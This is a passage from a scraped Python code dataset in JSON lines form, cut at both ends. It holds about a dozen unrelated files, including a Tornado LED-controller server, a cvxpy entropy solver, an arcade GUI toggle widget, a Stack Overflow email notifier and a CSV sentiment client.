file\ndoc = ElementTree.parse(options.infile)\nstrip_xml_namespace(doc.getroot())\n\n# Generate the index of all symbols\nsi = SymbolIndex(doc)\n\n# Generate all output files\nDocGenerator(si, options.cust).generate()\n","sub_path":"trunk/doc/api/doclobster.py","file_name":"doclobster.py","file_ext":"py","file_size_in_byte":23245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"22178841","text":"#!/usr/bin/env python\n\nimport socket\nimport time\nimport json\nimport enum\nimport array\n\n# for TCP Server\nfrom tornado.tcpserver import TCPServer\nfrom tornado.iostream import StreamClosedError\nfrom tornado import gen\n\n# for tornado webserver\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport tornado.websocket\nfrom tornado.options import define, options\n\nDEBUG = 1\n\nTCP_PORT = 4321\nTCP_INIT_PORT = 1234\n\nPRETZELBOARD_IPS = {}\nWS_CONNECTIONS = []\nwith open(\"./misc/programs.json\") as f:\n PROGRAMS = json.loads(f.read())\n\ndefine(\"port\", default=80, help=\"run on the given port\", type=int)\n\n# # [ms, cmd, lenH, lenL]\n# message_on_raw = [0, 1, 0, 1]\n# message_off_raw = [0, 0, 0, 1]\n# message_colorwipe_raw = [100, 2, 0, 1]\n\n# MESSAGE_ON = struct.pack(\"%dB\" % len(message_on_raw), *message_on_raw)\n# MESSAGE_OFF = struct.pack(\"%dB\" % len(message_off_raw), *message_off_raw)\n# MESSAGE_COLORWIPE = struct.pack(\"%dB\" % len(message_colorwipe_raw), *message_colorwipe_raw)\n\ndef main():\n init_server = TCPInitServer()\n init_server.listen(TCP_INIT_PORT)\n\n handlers = [\n (r\"/ws\", WsHandler),\n (r\"/\", tornado.web.RedirectHandler, {\"url\": \"./index.html\"}),\n (r\"/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./\"}),\n (r\"/js/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./js\"}),\n (r\"/css/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./css\"}),\n (r\"/img/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./img\"}),\n (r\"/misc/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./misc\"})\n ]\n\n # tornado.options.parse_command_line()\n application = tornado.web.Application(handlers)\n\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(options.port)\n\n loop = tornado.ioloop.IOLoop.current()\n\n loop.start()\n\n# converts program into pretzelbard commands\n# in: program as object\n# out: program for one led strip as bytestring as array\ndef convert_program(board_id, program):\n return_array = []\n first_array = []\n second_array = []\n third_array = []\n fourth_array = []\n fifth_array = []\n first_array.append(Modus[program['modus']].value)\n first_array.append(int(program['time']))\n return_array.append(first_array)\n for index, led in enumerate(program['strips'][int(board_id)]):\n \n if(index < 15):\n print(\"index: \" + str(index))\n for color in led:\n second_array.append(color)\n elif(index < 30):\n print(\"index: \" + str(index))\n for color in led:\n third_array.append(color)\n elif(index < 45):\n print(\"index: \" + str(index))\n for color in led:\n fourth_array.append(color)\n else:\n print(\"index: \" + str(index))\n for color in led:\n fifth_array.append(color)\n return_array.append(second_array)\n return_array.append(third_array)\n return_array.append(fourth_array)\n return_array.append(fifth_array)\n # encode\n for index, arrayy in enumerate(return_array):\n return_array[index] = array.array('B', arrayy).tostring()\n print(\"Return Array:\")\n print(return_array)\n return return_array\n\n# prints text if debugging is enabled in variable DEBUG\ndef debug(text):\n if DEBUG:\n print(text)\n\nclass Modus(enum.Enum):\n Off = 0\n On = 1\n Colorwipe = 2\n Normal = 3\n\n # handler for commands from web clients\nclass WsHandler(tornado.websocket.WebSocketHandler):\n\n def open(self):\n WS_CONNECTIONS.append(self)\n debug(\"Websocket opened\")\n\n def on_close(self):\n debug(\"websocket closed\")\n\n # respond on data from client\n def on_message(self, message):\n debug(\"Received message: \" + message)\n\n # process commands for LEDs/Pretzelboards\n if message.startswith(\"activate\"):\n program_id = message.split(\" \", 1)[1]\n program = PROGRAMS[int(program_id)]\n debug(\"Pretzelboard ips:\")\n debug(PRETZELBOARD_IPS)\n for board_id, board_ip in PRETZELBOARD_IPS.items():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((board_ip, TCP_PORT))\n converted_program = convert_program(board_id, program)\n for arrayy in converted_program:\n s.send(arrayy)\n time.sleep(.3)\n\n # override a program that got updated by client in list and json file\n elif message.startswith(\"update\"):\n program_id = message.split(\" \", 2)[1]\n program = message.split(\" \", 2)[2]\n PROGRAMS[int(program_id)] = json.loads(program)\n json_string = json.dumps(PROGRAMS)\n with open(\"./misc/programs.json\", \"w\") as f:\n f.write(json_string)\n\n # appends new program to list and writes new json file\n elif message.startswith(\"append\"):\n program = message.split(\" \", 2)[1]\n PROGRAMS.append(json.loads(program))\n json_string = json.dumps(PROGRAMS)\n print(\"Programs: \")\n print(PROGRAMS)\n with open(\"./misc/programs.json\", \"w\") as f:\n f.write(json_string)\n\n elif message.startswith(\"delete\"):\n program_id = message.split(\" \", 2)[1]\n del PROGRAMS[program_id]\n json_string = json.dumps(PROGRAMS)\n with open(\"./misc/programs.json\", \"w\") as f:\n f.write(json_string)\n\n\n# TCP server for connection initiation from pretzelbards\nclass TCPInitServer(TCPServer):\n @gen.coroutine\n def handle_stream(self, stream, address):\n while True:\n try:\n data = yield stream.read_bytes(3)\n pretzelboard_name = data.decode()[0]\n debug(\"Pretzelboard \" + pretzelboard_name + \" connected.\")\n pretzelboard_ip = address[0]\n debug(\"pretzelboard_ip: \" + pretzelboard_ip)\n PRETZELBOARD_IPS[pretzelboard_name] = pretzelboard_ip\n except StreamClosedError:\n break\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"tornado/tornado_server.py","file_name":"tornado_server.py","file_ext":"py","file_size_in_byte":6183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"306257345","text":"from collections import defaultdict\nfrom Utils import *\n\n\n\ndef getWeatherTransientModel(weather_point_list):\n #weather_dist_timestamp_dict = getWeatherDistTimesDict(weather_point_list)\n weather_timestamp_dist_dict = getWeatherTimesDistDict(weather_point_list)\n weather_transient_model = getAverageWeatherDataDictByTime(weather_timestamp_dist_dict)\n return weather_transient_model\n\n\n\ndef getAverageWeatherDataDictByTime(weather_timestamp_dist_dict):\n weather_timestamp_dict = {}\n for timestamp in sorted(weather_timestamp_dist_dict):\n temperature_list = []\n windspeed_list = []\n nsd_list = []\n visibility_list = []\n for dist in sorted(weather_timestamp_dist_dict [timestamp].keys()):\n temperature, windspeed, nsd, visibility = weather_timestamp_dist_dict [timestamp][dist]\n temperature_list.append(temperature)\n windspeed_list.append(windspeed)\n nsd_list.append(nsd)\n visibility_list.append(visibility)\n\n averageTemperature = sum(temperature_list)/len(temperature_list)\n averageWindSpeed = sum(windspeed_list)/len(windspeed_list)\n average_nsd = sum(nsd_list)/len(nsd_list)\n average_visibility = sum(visibility_list)/len(visibility_list)\n weather_timestamp_dict[timestamp] = (averageTemperature, averageWindSpeed, average_nsd, average_visibility)\n\n return weather_timestamp_dict\n\n\n\n\ndef getWeatherDistTimesDict(weather_point_list):\n weather_dist_timestamp_dict = defaultdict(lambda: defaultdict(float))\n\n for weather_point in weather_point_list:\n weather_dist = weather_point.getDistanceTravelled()\n weather_timestamp = weather_point.getWeatherTimestamp()\n weather_temperature = weather_point.getTemperature()\n weather_windspeed = weather_point.getWindSpeed()\n weather_dist_timestamp_dict[weather_dist][weather_timestamp] = (weather_temperature, weather_windspeed)\n\n return weather_dist_timestamp_dict\n\n\n\ndef getWeatherTimesDistDict(weather_point_list):\n weather_timestamp_dist_dict = defaultdict(lambda: defaultdict(float))\n\n for weather_point in weather_point_list:\n weather_dist = weather_point.getDistanceTravelled()\n weather_timestamp = weather_point.getWeatherTimestamp()\n weather_temperature = weather_point.getTemperature()\n weather_windspeed = weather_point.getWindSpeed()\n weather_nsd = weather_point.getNearestStormDistance()\n weather_visibility = weather_point.getVisiblity()\n weather_timestamp_dist_dict[weather_timestamp][weather_dist] = (weather_temperature, weather_windspeed, weather_nsd, weather_visibility)\n\n return weather_timestamp_dist_dict","sub_path":"data/WeatherService.py","file_name":"WeatherService.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"243955987","text":"from tqdm import tqdm\r\nfrom multiprocessing import Pool\r\n\r\nclass Test :\r\n def __init__(self,val,id):#,no_of_tags,tags):\r\n self.val=val\r\n self.id=id\r\n self.oren=val[0]\r\n self.no_of_tags=int(val[2])\r\n self.tags=val[4:-1]\r\n self.tagsList=self.tags.split(' ')\r\n\r\n\r\nfile = open('e.txt','r')\r\n\r\nno_of_lines = int(file.readline())\r\n\r\nfile = open('e.txt','r')\r\n\r\nn=no_of_lines\r\n\r\nmy_object = []\r\n\r\nd=file.readline()\r\nflag = False\r\ntmpobj = []\r\nvFlag=False\r\nfor f in range(no_of_lines):\r\n tmp =file.readline()\r\n if tmp[0] == 'V' and vFlag==True:\r\n n=n-1\r\n vFlag=False\r\n else:\r\n vFlag=True\r\n obj = Test(tmp,str(f))\r\n my_object.append(obj)\r\n\r\nN = len(my_object)\r\n\r\n\r\nmax = 0\r\nfor i in tqdm(range(N)):\r\n for j in range(i+1,N):\r\n common=list(set(my_object[i].tagsList).intersection(my_object[j].tagsList))\r\n if len(common)>0:\r\n if len(common)>max:\r\n my_object[i+1],my_object[j]=my_object[j],my_object[i+1]\r\n else:\r\n max = len(common)\r\n if i > (N-max):\r\n my_object[i + 1], my_object[j] = my_object[j], my_object[i + 1]\r\n else:\r\n my_object[max+len(common)], my_object[j] = my_object[j], my_object[max+len(common)]\r\n\r\n\r\n#######################################################################################################\r\n#Write the final file\r\n\r\nflag=False\r\np = 0\r\n\r\nnewfile = open('e_sol.txt', 'w')\r\nnewfile.write(str(n))\r\nnewfile.write('\\n')\r\n\r\nfor i in range(len(my_object)):\r\n if my_object[i].oren == 'V':\r\n if flag is False:\r\n p=my_object[i].id\r\n flag=True\r\n else:\r\n newfile.write(str(p) +\" \" + str(my_object[i].id))\r\n newfile.write('\\n')\r\n flag=False\r\n else:\r\n newfile.write(str(my_object[i].id))\r\n newfile.write('\\n')\r\n","sub_path":"Hash Code 2K19/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"452378140","text":"class Solution(object):\n def maximumSwap(self, num):\n s = list(str(num))\n\n i = 0\n while i < len(s) -1:\n if s[i] < s[i+1]:\n break\n i += 1\n if i == len(s) -1:\n return num\n max_idx, max_value = i+1, s[i+1]\n\n for j in range(i+1, len(s)):\n if s[j] >= max_value:\n max_idx, max_value = j, s[j]\n min_idx = i\n for j in range(i, -1, -1):\n if s[j] < max_value:\n min_idx = s[j]\n s[min_idx], s[max_idx] = s[max_idx], s[min_idx]\n return int(''.join(s))\n","sub_path":"practice_problems/Array_and_Strings/Maximum Swap.py","file_name":"Maximum Swap.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"526984010","text":"from django.urls import path\n\nfrom user import views\napp_name = 'T-user'\nurlpatterns = [\n # 用户中心\n path('home_page/', views.homeView, name='home_page'),\n # 用户的注册和登录\n path('login/', views.loginView, name='login'),\n path('register/', views.register, name='register'),\n path('register01/', views.register01, name='register01'),\n # 退出用户登录\n path('logout/', views.logoutView, name='logout'),\n]\n","sub_path":"Talented_Project/user/user_.py","file_name":"user_.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"514726553","text":"inTxt=open(r'input.txt',\"r\")\r\nreplacements=[\r\n #xkcd 1288\r\n ['witnesses','these dudes I know'],\r\n ['allegedly','kinda probably'],\r\n ['new study','Tumblr post'],\r\n ['rebuild','avenge'],\r\n ['space','spaaace'],\r\n ['google glass','virtual boy'],\r\n ['smartphone','Pokedex'],\r\n ['electric','atomic'],\r\n ['senator','Elf-Lord'],\r\n ['car','cat'],\r\n ['election','eating contest'],\r\n ['leader','river spirit'],\r\n ['homeland security','homestar runner'],\r\n ['could not be reached for comment','is guilty and everyone knows it'],\r\n #xkcd 1625\r\n ['debate','dance-off'],\r\n ['self-driving','uncontrollably swerving'],\r\n ['poll','psychic reading'],\r\n ['canidate','airbender'],\r\n ['drone','dog'],\r\n ['vows to',\"probably won't\"],\r\n ['at large','very large'],\r\n ['sucessfully','suddenly'],\r\n ['expands','physically expands'],\r\n [['first degree','second degree','third degree'],\"friggin' awful\"],\r\n ['an unknown number','like hundreds'],\r\n ['front runner','blade runner'],\r\n ['global','spherical'],\r\n ['years','minutes'],\r\n ['minutes','years'],\r\n ['no indication','lots of signs'],\r\n ['urged restraint by','drunkenly urged on'],\r\n ['horsepower','tons of horsemeat'],\r\n #xkcd 1679\r\n ['gaffe','magic spell'],\r\n ['ancient','haunted'],\r\n ['star-studded','blood-soaked'],\r\n ['remains to be seen','will never be known'],\r\n ['silver bullet','way to kill werewolves'],\r\n ['subway system','tunnels I found'],\r\n ['suprising','suprising (but not to me)'],\r\n ['war of words','interplanetary war'],\r\n ['tension','sexual tension'],\r\n ['cautiously optimistic','delusional'],\r\n ['doctor who','the Big Bang Theory'],\r\n ['win votes','find Pokemon'],\r\n ['behind the headlines','beyond the grave'],\r\n [['email','facebook post','tweet'],'poem'],\r\n ['facebook ceo','this guy'],\r\n ['lastest','final'],\r\n ['disrupt','destroy'],\r\n ['meeting','ménage à trois'],\r\n ['scientists','Channing Tatum and his friends'],\r\n [\"you won't belive\",\"I'm really sad about\"],\r\n #custom\r\n ['china','[CENSORED]'],\r\n ['chromebook','trashbook'],\r\n [['nuclear weapon','nuclear bomb','atomic bomb','hydrogen bomb'],'extinction ball'],\r\n ['russia','Putinland'],\r\n ['brexit','us being lazy'],\r\n [['united states','america',' us ',' usa ','united states of america','u.s.','u.s.a.'],'freedom eagle'],\r\n ['impeach','bully'],\r\n ['manager','overseer'],\r\n ['coup','party'],\r\n ['trial','PowerPoint presentation'],\r\n ['speaker','residential liar'],\r\n ['speak','complain'],\r\n ['testify','deny everything'],\r\n ['trump','tangerine'],\r\n ['article','kidney stone']\r\n ]\r\ntmp=''\r\nfor line in inTxt:\r\n tmp= str(line)\r\n for i in replacements:\r\n if isinstance(i[0],list):\r\n for e in i[0]:\r\n if (line.upper()).count(e.upper())>=1:\r\n tmp=((tmp.lower()).replace(e.lower(),i[1].lower()))\r\n break\r\n else:\r\n if (line.upper()).count(i[0].upper())>=1:\r\n tmp=((tmp.lower()).replace(i[0].lower(),i[1].lower()))\r\n print(tmp)\r\n\r\n","sub_path":"XKCD_substitution.py","file_name":"XKCD_substitution.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"635093552","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2009 TUBITAK/UEKAE\n# Licensed under the GNU General Public License, version 2.\n# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt\n\nfrom pisi.actionsapi import autotools\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import shelltools\nfrom pisi.actionsapi import get\n\nWorkDir=\"qtscriptgenerator-src-%s\" % get.srcVERSION()\n\ndef setup():\n shelltools.cd(\"generator\")\n shelltools.system(\"qmake-qt4 generator.pro\")\n shelltools.cd(\"../qtbindings\")\n shelltools.system(\"qmake-qt4 qtbindings.pro\")\n\ndef build():\n shelltools.cd(\"generator\")\n autotools.make(\"-j1\")\n shelltools.system(\"QTDIR=/usr/qt/4 ./generator --include-paths='/usr/qt/4/include/'\")\n\n shelltools.cd(\"../qtbindings\")\n autotools.make(\"-j1\")\n\ndef install():\n pisitools.insinto(\"/usr/qt/4/plugins/script\", \"plugins/script/*\")\n pisitools.insinto(\"%s/qtscriptgenerator\" % get.docDIR(), \"doc/*\")\n\n pisitools.dodoc(\"LICENSE.GPL\")\n","sub_path":"pardus/tags/2009-EOL/desktop/toolkit/qt/qtscriptgenerator/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"402554394","text":"import numpy as np, cvxpy as cp, numpy.random as random\n\n\ndef Solver(numVars, method=0):\n mOnes = np.ones(numVars)\n a = np.sort(random.uniform(-1, 1, numVars))\n\n p = cp.Variable(numVars)\n entropy = cp.sum(cp.entr(p))\n if method == 1:\n aSq = np.power(a, 2)\n aExp = 3 * np.power(a, 3) - 2 * a\n aLessPoint5 = [a < 0.5] * 1\n constraints = [p >= 0,\n cp.matmul(mOnes, p) == 1,\n p @ a <= 0.1,\n p @ a >= -0.1,\n p @ aSq >= 0.5,\n p @ aSq <= 0.6,\n p @ aExp >= -0.3,\n p @ aExp <= -0.2,\n p @ aLessPoint5 >= 0.3,\n p @ aLessPoint5 <= 0.4]\n else:\n constraints = [p >= 0, cp.matmul(mOnes, p) == 1]\n\n prob = cp.Problem(cp.Maximize(entropy), constraints)\n prob.solve()\n print(\"numVars = \", numVars, \"p.value=\", p.value)\n return a, p.value\n\n\ndef PartsRunner(filename, numRange, method=0):\n f = open(filename, \"w\")\n f.write(\"numVariables,p values->\\n\")\n f.close()\n\n for numVars in numRange:\n f = open(filename, \"a\")\n a, pVals = Solver(numVars, method)\n\n if pVals is not None:\n f.write(str(numVars) + \"-random-vals:\" + \",\")\n f.write(\",\".join(str(i) for i in a) + \"\\n\")\n f.write(str(numVars) + \"-probabilities:\" + \",\")\n f.write(\",\".join(str(i) for i in pVals) + \"\\n\")\n else:\n f.write(\"Equations Not Satisfied for matrix size:\"+str(numVars) + \"\\n\")\n f.close()\n\n\nif __name__ == \"__main__\":\n random.seed(8)\n numRange = range(2, 21, 2)\n filename = \"outputs/pVals6.1.txt\"\n PartsRunner(filename, numRange, 0)\n numRange = range(10, 31, 2)\n filename = \"outputs/pVals6.2.txt\"\n PartsRunner(filename, numRange, 1)\n","sub_path":"Question6.py","file_name":"Question6.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"217991000","text":"import logging\nfrom pyramid.view import view_config, notfound_view_config\nfrom pyramid.response import Response\n\n\ntextfiles = [\n{\n\n}\n]\n\n\n@view_config(route_name='textfile', renderer='json')\ndef get_textfile(request):\n name = request.matchdict['name']\n return textfiles[name]\n\n@view_config(route_name='textfiles', renderer='json')\ndef list_textfiles(request):\n return textfiles\n\n@view_config(route_name='home', renderer='json')\ndef my_view(request):\n return {'project': 'mathlete_pyr'}\n\n\n@notfound_view_config(renderer='json')\ndef not_found_error(request):\n request.response.status = 404\n return {'error': {\n 'code' : 404,\n 'message' : 'invalid request'\n }}","sub_path":"just_for_fun/mathlete_pyr/mathlete_pyr/controllers/math/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"353697995","text":"import argparse\nimport datetime\nimport json\nimport requests\nimport smtplib\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-c\", \"--config\", dest=\"config\",\n help=\"Read settings from FILE\", metavar=\"FILE\")\nparser.add_argument(\"-o\", \"--output\", dest=\"output\",\n help=\"Save question IDs to FILE\", metavar=\"FILE\")\n\nargs = parser.parse_args()\n\nfp = open(args.config, \"r\")\nconfig = json.load(fp)\nfp.close()\n\nfp = open(args.output, \"r\")\nquestion_ids = json.load(fp)\nfp.close()\n\nfrom_date = datetime.date.today() - datetime.timedelta(365)\nfrom_date = from_date.strftime(\"%s\")\n\nserver = smtplib.SMTP(\"smtp.gmail.com\", 587)\nserver.starttls()\nserver.login(config.get(\"username\"), config.get(\"passsword\"))\n\nfor term in config.get(\"terms\"):\n url = \"http://api.stackexchange.com/2.2\"\n query = {\n \"fromdate\": from_date,\n \"order\": \"desc\",\n \"site\": \"stackoverflow\"\n }\n\n headers = [\n \"From: \" + config.get(\"from\"),\n \"To: \" + config.get(\"to\"),\n ]\n\n if term.get(\"type\") == \"tag\":\n url += \"/questions\"\n query[\"tagged\"] = term.get(\"term\")\n else:\n url += \"/search\"\n query[\"intitle\"] = term.get(\"term\")\n\n response = requests.get(url, params=query)\n status = response.status_code\n body = response.json()\n\n if status != 200:\n headers.append(\"Subject: Stack Overflow API error \" + status)\n body = \"\\r\\n\".join(headers) + \"\\r\\n\\r\\n\" + body.get(\"error_message\")\n\n server.sendmail(config.get(\"from\"), config.get(\"to\"), body)\n\n continue\n\n for item in body.get(\"items\"):\n question_id = item.get(\"question_id\")\n\n if question_id in question_ids:\n continue\n\n headers.append(\"Subject: New Stack Overflow question mentioning \" + term.get(\"term\"))\n body = \"\\r\\n\".join(headers) + \"\\r\\n\\r\\n\" + item.get(\"link\")\n\n server.sendmail(config.get(\"from\"), config.get(\"to\"), body)\n\n question_ids.append(question_id)\n\nfp = open(args.output, \"w\")\njson.dump(question_ids, fp, indent=4)\nfp.close()\n\nserver.quit()\n","sub_path":"stackoverflow-notify.py","file_name":"stackoverflow-notify.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"164899436","text":"from typing import Optional\r\nfrom uuid import uuid4\r\n\r\nfrom PIL import Image, ImageDraw\r\n\r\nfrom arcade import Texture\r\nfrom arcade.gui import UIClickable\r\nfrom arcade.gui.ui_style import UIStyle\r\n\r\n\r\nclass UIAbstractToggle(UIClickable):\r\n _value: bool\r\n _true_texture: Optional[Texture]\r\n _false_texture: Optional[Texture]\r\n\r\n def __init__(\r\n self,\r\n value: bool = True,\r\n center_x: int = 0,\r\n center_y: int = 0,\r\n **kwargs):\r\n super().__init__(\r\n center_x=center_x,\r\n center_y=center_y,\r\n **kwargs\r\n )\r\n\r\n self.register_event_type('on_toggle')\r\n\r\n self._value = value\r\n\r\n @property\r\n def value(self) -> bool:\r\n \"\"\"\r\n current value\r\n \"\"\"\r\n return self._value\r\n\r\n @value.setter\r\n def value(self, value: bool):\r\n self._value = value\r\n self.dispatch_event('on_toggle', value)\r\n self.set_proper_texture()\r\n\r\n def set_proper_texture(self):\r\n preserve_scale = self.scale\r\n\r\n if self.value:\r\n self.texture = self._true_texture\r\n else:\r\n self.texture = self._false_texture\r\n\r\n self.scale = preserve_scale\r\n\r\n def toggle(self):\r\n \"\"\"\r\n Toggles current value (True => False, False => True)\r\n \"\"\"\r\n self.value = not self.value\r\n\r\n def on_click(self):\r\n self.value = not self.value\r\n\r\n def on_toggle(self, value):\r\n \"\"\"\r\n Called if value changes through programmatic change or user interaction.\r\n \"\"\"\r\n pass\r\n\r\n\r\nclass UIImageToggle(UIAbstractToggle):\r\n \"\"\"\r\n A toggle which can be `true` or `false`.\r\n\r\n Switches between two images. Useful for switches like fullscreen or sound mute/unmute.\r\n \"\"\"\r\n\r\n def __init__(self,\r\n true_texture: Texture,\r\n false_texture: Texture,\r\n center_x: int = 0,\r\n center_y: int = 0,\r\n value: bool = True,\r\n id: Optional[str] = None,\r\n style: UIStyle = None,\r\n **kwargs):\r\n \"\"\"\r\n :param true_texture: displayed if value is True\r\n :param false_texture: displayed if value is False\r\n :param center_x: center X of element\r\n :param center_y: center y of element\r\n :param value: initial value\r\n :param id: id of :py:class:`arcade.gui.UIElement`\r\n :param style: style of :py:class:`arcade.gui.UIElement`\r\n :param kwargs: catches unsupported named parameters\r\n \"\"\"\r\n super().__init__(\r\n center_x=center_x,\r\n center_y=center_y,\r\n value=value,\r\n id=id,\r\n style=style,\r\n **kwargs)\r\n self.style_classes.append('image-toggle')\r\n\r\n self._true_texture = true_texture\r\n self._false_texture = false_texture\r\n\r\n self.set_proper_texture()\r\n\r\n def render(self):\r\n self.set_proper_texture()\r\n\r\n\r\nclass UIToggle(UIAbstractToggle):\r\n \"\"\"\r\n A toggle which can be `true` or `false`.\r\n\r\n Style attributes:\r\n * color_true: color of the lever when value is `true`\r\n * bg_color_true: color of the background when value is `true`\r\n * color_false: color of the lever when value is `false`\r\n * bg_color_false: color of the background when value is `false`\r\n \"\"\"\r\n\r\n def __init__(self,\r\n center_x: int = 0,\r\n center_y: int = 0,\r\n height: int = 0,\r\n value: bool = True,\r\n id: Optional[str] = None,\r\n style: UIStyle = None,\r\n **kwargs):\r\n \"\"\"\r\n :param center_x: center X of element\r\n :param center_y: center y of element\r\n :param height: height of element, width depends on height\r\n :param value: initial value\r\n :param id: id of :py:class:`arcade.gui.UIElement`\r\n :param style: style of :py:class:`arcade.gui.UIElement`\r\n :param kwargs: catches unsupported named parameters\r\n \"\"\"\r\n super().__init__(\r\n center_x=center_x,\r\n center_y=center_y,\r\n value=value,\r\n id=id,\r\n style=style,\r\n **kwargs\r\n )\r\n self.style_classes.append('toggle')\r\n self._height = height\r\n\r\n self.render()\r\n\r\n @staticmethod\r\n def _round_corner(radius, fill):\r\n \"\"\"Draw a round corner\"\"\"\r\n corner = Image.new('RGBA', (radius, radius), (0, 0, 0, 0))\r\n draw = ImageDraw.Draw(corner)\r\n draw.pieslice((0, 0, radius * 2, radius * 2), 180, 270, fill=fill)\r\n return corner\r\n\r\n @staticmethod\r\n def _round_rectangle(size, radius, fill):\r\n \"\"\"Draw a rounded rectangle\"\"\"\r\n width, height = size\r\n rectangle = Image.new('RGBA', size, fill)\r\n corner = UIToggle._round_corner(radius, fill)\r\n rectangle.paste(corner, (0, 0))\r\n rectangle.paste(corner.rotate(90), (0, height - radius)) # Rotate the corner and paste it\r\n rectangle.paste(corner.rotate(180), (width - radius, height - radius))\r\n rectangle.paste(corner.rotate(270), (width - radius, 0))\r\n return rectangle\r\n\r\n def _render_toggle(self, right: bool, color, bg_color) -> Texture:\r\n height = self._height\r\n width = self._height * 2\r\n\r\n border_radius = height // 2\r\n radius = height * 0.42\r\n padding = radius * 0.16\r\n pos_y = height // 2\r\n pos_x = width - radius - padding if right else radius + padding\r\n\r\n # Scale to look pretty\r\n SCALE = 2\r\n width *= SCALE\r\n height *= SCALE\r\n border_radius *= SCALE\r\n radius *= SCALE\r\n padding *= SCALE\r\n pos_x *= SCALE\r\n pos_y *= SCALE\r\n\r\n # False\r\n switch = UIToggle._round_rectangle((width, height), border_radius, bg_color)\r\n d = ImageDraw.Draw(switch)\r\n d.ellipse((pos_x - radius, pos_y - radius, pos_x + radius, pos_y + radius), fill=color)\r\n switch = switch.resize((switch.width // SCALE, switch.height // SCALE), resample=Image.LANCZOS)\r\n return Texture(name=str(uuid4()), image=switch)\r\n\r\n def render(self):\r\n color_true = self.style_attr('color_true')\r\n bg_color_true = self.style_attr('bg_color_true')\r\n self._true_texture = self._render_toggle(True, color_true, bg_color_true)\r\n\r\n color_false = self.style_attr('color_false')\r\n bg_color_false = self.style_attr('bg_color_false')\r\n self._false_texture = self._render_toggle(False, color_false, bg_color_false)\r\n\r\n self.set_proper_texture()\r\n","sub_path":"env/lib/python3.8/site-packages/arcade/gui/elements/toggle.py","file_name":"toggle.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"446616262","text":"import csv\nimport requests\nfrom requests import HTTPError\nimport json\nfrom config import api_config\nimport config\nimport io\nimport codecs\n\n\nclass CSVFile:\n\n def __init__(self, file_path, delimiter, quotechar=None):\n self.file_path = file_path\n self.fieldnames = None\n self.delimiter = str(delimiter) if delimiter else ','\n self.quotechar = quotechar\n\n self.api_url = api_config['server_ip'] + api_config['resource']\n if quotechar:\n self.csv_data = self.__load_csv__(file_path=self.file_path, delimiter=self.delimiter, quotechar=self.quotechar)\n else:\n self.csv_data = self.__load_csv__(file_path=self.file_path, delimiter=self.delimiter)\n\n if len(self.csv_data) < 1:\n raise ValueError('CSV has 1> rows.')\n\n def has_column(self, column_name):\n return True if column_name in self.fieldnames else False\n\n def __load_csv__(self, file_path, delimiter, encoding='utf-8', **kwargs):\n if not delimiter:\n delimiter = ','\n\n encodings = ['utf-8', 'mac_roman', 'mac_latin2', 'cp865', 'latin_1', 'cp1251']\n\n try:\n with io.open(file_path, 'r', encoding=encoding) as csvfile:\n reader = csv.DictReader(csvfile, delimiter=delimiter, **kwargs)\n\n self.fieldnames = reader.fieldnames\n return tuple(reader)\n except UnicodeDecodeError:\n encoding = encodings[encodings.index(encoding)+1]\n return self.__load_csv__(file_path, delimiter, encoding=encoding, **kwargs)\n\n def __get_splits__(self, call_limit=4000):\n row_count = len(self.csv_data)\n\n # Partition all the calls in 10000 items each (to avoid HTTP 413)\n for each_split in range(0, row_count, call_limit):\n yield self.csv_data[each_split:each_split + call_limit]\n\n def calculate_sentiment(self, column_name):\n new_file = []\n\n\n for data_partition in self.__get_splits__():\n\n texts = [row[column_name] for row in data_partition]\n\n req = json.dumps(dict(data=texts))\n r = requests.post(self.api_url, data=req)\n # Only do this, if the status code is OK\n if r.status_code == 200:\n payload = r.json()\n predictions = payload['data']\n # Zip the original data with the new predictions\n for org_dict, new_dict in zip(data_partition, predictions):\n new_dict.pop('text')\n org_dict.update(new_dict)\n\n six_way_subset = self.get_dict_subset(org_dict, config.chart_config['sentiment_types'])\n org_dict['winning_emotion'] = self.get_winning_emotion(six_way_subset)\n org_dict['winning_emotion_score'] = self.get_winning_emotion_score(six_way_subset)\n\n new_file.append(org_dict)\n else:\n raise HTTPError('Got status code {0}'.format(str(r.status_code)))\n self.csv_data = new_file\n\n return new_file\n\n def 